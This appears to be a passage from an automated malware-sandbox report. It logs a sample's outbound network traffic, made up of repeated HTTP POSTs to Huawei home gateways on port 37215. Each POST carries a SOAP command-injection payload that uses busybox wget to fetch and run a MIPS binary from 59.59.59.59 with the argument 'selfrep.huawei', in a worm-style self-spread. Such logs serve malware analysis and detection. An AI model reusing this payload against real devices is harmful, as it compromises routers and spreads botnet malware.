                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2035192.168.2.1534294157.219.55.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064059019 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2036192.168.2.155889441.27.181.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064115047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2037192.168.2.1560010157.156.163.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064310074 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2038192.168.2.154963223.110.236.5837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064333916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2039192.168.2.1560446197.178.151.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064538956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2040192.168.2.154404841.71.191.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064627886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2041192.168.2.1547152157.218.52.18537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064666033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2042192.168.2.155018041.110.113.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064682007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2043192.168.2.1560338197.165.211.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.064948082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2044192.168.2.1559140197.37.88.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.065510035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 